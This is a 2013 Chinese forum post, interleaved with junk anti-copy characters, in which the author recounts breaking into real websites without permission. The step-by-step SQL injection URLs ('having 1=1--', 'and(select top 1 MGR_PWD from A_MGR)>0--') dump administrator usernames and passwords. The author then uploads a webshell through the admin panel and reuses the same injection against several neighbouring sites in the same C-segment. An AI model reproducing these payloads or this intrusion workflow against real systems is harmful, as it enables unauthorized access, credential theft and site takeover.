发现一个注入点
. o) f% V" ^2 S' r% ]. i) q5 K$ khttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
' @3 |( B, k5 E! h# N/ R# a! p5 [: `6 K$ {8 ^/ @' }
习惯性的加’having1=1--) e9 f9 M2 S+ Q9 ]
" i' Y) O" u' I7 X
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
0 Z4 V/ w# `' }. f$ ]; Y0 k
1 v5 K- |$ `1 {02 g+ G: S. M/ r1 B
' V2 g* c* k5 o7 y2 V& h% o( p
爆出Diary_A.dl_Title(这时候很激动啊)( u, D# D7 ]5 ?! V
2 R d1 ~% `' L) Z4 e那么继续
- ~ I: e8 L$ F/ \; g& m# K7 lhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
+ ]4 x) c4 j; R9 R" F0 r
/ ^# l+ ^5 r) [. i" h& l继续,一直爆下去, m) m, q. N3 O% G4 t' f
; O N p2 L' x/ r; l爆到几个字段和表段 但是没找到需要的管理用户的字段
% | h0 }" ?' J: q9 t4 s
2 f* ~2 h$ R. y4 C. @& u$ {蛋疼了 怎么办 然后去后台登陆页看源码
/ S2 L$ T- {* m9 C/ i) h+ |$ v3 |: n" ] U5 B5 t
05 L$ B: B1 g" y+ [ H
$ m. q$ I! M# n# z: @
Input name= “ADUID”6 Q# u4 g1 l1 p
Input name= “ADPWD”
$ L- B0 R8 ~# L* |9 O8 a: }% A9 T3 a: Y. g5 w) F
很幸运 找到了字段那就继续
, N# a6 l/ [9 X6 z+ n找到之后开始爆用户( G5 @% k* ] E3 l1 Z
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—/ G2 \0 y! L, O* ~+ h2 {
爆密码
; A: k+ h- s) K9 z6 ?2 S; K( c0 Nhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—4 i4 a' A% ` M: E! [( r/ u7 }& A
测试了下 这个注入点只能爆到文章哪里的表
. \5 `( W( K7 ~1 [4 \" W/ r; j: T r0 S( S
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了" |# S+ _9 |% Y, I% w, l/ L& D
( i; M* I: s. A. ]
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
* D: ~* r$ O. j n1 E% J: r4 e; [) G9 }0 b
473
; K1 Q* E. T* u! C) ]0 b1 e5 u: T; O% f. m$ ]
进后台
6 V; [% ~+ c; e$ t+ D; R/ ?
% ]3 ~. s+ [$ s' R" w6 v0 D9 F) P; o7 F* @* Q. M& _7 H+ B, [
发现几个上传点 有的地方不能上传 而且防止恶意代码, L+ l7 h2 f& t9 t+ M4 @
5 @0 h* k0 M! \. R" X2 C/ R没办法 各种百度各种找大牛 找到一只好像可以突破的马3 B- c+ c8 Z) |( D( U- Y
7 J) {, ]3 G' I! U+ X6 S
8 m1 U$ g. B/ B1 v5 L在系统管理那里直接上传 不过没有显示地址
# R4 M @$ u1 v2 e% ]- X9 g) T% s5 K1 m6 c) k1 {7 J
再上传一次 抓包 搞定OK; y0 }, J+ Q7 c; z X
' o- ?3 z/ p# g& J1 w
. o# R y7 q U5 R" ~5 ` Y |) a8 V3 N
472
% d! R8 o5 q% \
8 h+ i+ [5 s& E2 B0 n+ y晚上不行了 去睡觉。。。
# w" C1 d7 b7 v0 Z8 ?2 O) K# b8 [第二天刚起床 闲的没事做继续日站吧
/ e, c! ^! F: N/ |
* H0 a) Z8 y2 C0 ]6 U7 Q找个站 就把这个站的旁c扫了下
9 p$ q2 ~; N" S
& W2 D/ z. C) V `发现c段也有一个购物站 ,然后还和这个站的模板差不多( q2 F/ |& f& M9 s' `7 n# {9 H
& }2 N5 H8 S! P3 w0 L
就找到会员登录口测试
) ^6 T% r" T9 r% d; R. K
" I+ d8 g" X1 C' m4 ]5 n5 X'and (select top 1 MGR_UID from A_MGR)>0—
\, \5 W7 } g( l# {0 S$ @果断爆到了 这时候我很激动 通杀2 m3 x; }+ p) a5 x- o
6 Y+ V4 S" e- t. g; s; {4 D/ \
再次翻c段5 U( _& T4 z8 s0 Q \
! O2 z/ z! C: ?翻出几个站 都成功拿下
- N4 Y" Q7 i# `8 h- J! Z0 H7 ?; w5 }9 D3 L1 A! m0 d
8 {, L U9 Q, P1 k, {. u) L0 m; e. K) J+ s* n3 F
修复方案:
+ b2 t8 V( V. ^6 q他们比我专业 3 A1 s, R/ J1 y2 W
* z% `7 w: i+ t- M
' L* {+ b. E. u! Z L- m- \4 ^" _, t* ?; }# t% R- ^+ b
|
发表于 2013-4-4 17:40:38
收藏
支持
反对